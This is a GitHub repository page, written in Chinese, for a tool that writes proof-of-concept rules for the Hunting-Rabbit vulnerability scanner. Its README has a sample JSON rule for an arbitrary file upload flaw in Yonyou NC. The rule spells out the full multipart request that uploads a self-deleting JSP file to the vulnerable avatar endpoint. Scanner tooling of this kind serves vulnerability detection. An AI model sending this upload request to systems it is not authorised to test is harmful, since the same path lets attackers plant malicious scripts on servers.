Skip to content

langsasec/Hunting-Rabbit-POC-Generator

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
img
img
 
 
Hunting-Rabbit-POC-Generator.py
Hunting-Rabbit-POC-Generator.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
favicon.ico
favicon.ico
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Hunting-Rabbit-POC-Generator

简介

本项目为 Hunting-Rabbit 系列项目之一 ,是Hunting-Rabbit-VulScanner 专属POC生成器,致力于最直观简洁的POC编写。

截图/演示

image-20240620110948651

生成的POC如下:

image-20240620111438677

{
    "vul_name": "用友 NC avatar 任意文件上传",
    "level": "高危",
    "description": "用友 NC acatar接口存在任意文件上传漏洞,可上传恶意脚本至服务器。",
    "product": "用友 NC",
    "version": "用友 NC",
    "cve": "",
    "reference": "https://mp.weixin.qq.com/s/SS_KVTcomHmWbP5zEvVyMw",
    "fixing": "https://blog.csdn.net/qq_36618918/article/details/137913219\n1、升级到安全版本\n 2、如非必要,禁止公网访问该系统。\n 3、设置白名单访问。",
    "rule": {
        "path": "/uapim/upload/avatar?usercode=qbll&fileType=jsp",
        "method": "GET",
        "headers": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nConnection: close\nContent-Length: 242\nAccept-Encoding: gzip, deflate, br\nContent-Type: multipart/form-data; boundary=----v6bavojmqudas7g0al2o",
        "body": "------v6bavojmqudas7g0al2o\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"klywwjrrux.jsp\"\n\n<%out.print(\"lmnpl\");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\n------v6bavojmqudas7g0al2o--",
        "status_code": "200",
        "keywords": "true",
        "res_time": ""
    },
    "operator": {
        "author": "浪飒",
        "email": "langsa-hy@qq.com",
        "github": "https://github.com/langsasec"
    }
}

安装和使用

  1. 拉取代码:

    git clone https://github.com/langsasec/Hunting-Rabbit-POC-Generator

  2. 安装依赖

    cd Hunting-Rabbit-POC-Generator && pip install -r requirements.txt

  3. Python3运行

    python Hunting-Rabbit-POC-Generator.py

  4. 运行后会生成config.ini配置文件,内容如下,可自行配置

    # 请勿删除此行,这是为了用户填写联系信息,你将是POC的贡献者,方便其他用户使用POC时可以互相联系,也可以不填写
Author= 你的名字
Email=邮箱
GitHub=Github地址

About

Hunting-Rabbit-VulScanner 专属POC生成器

hr.langsasec.cn/

Topics

poc

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages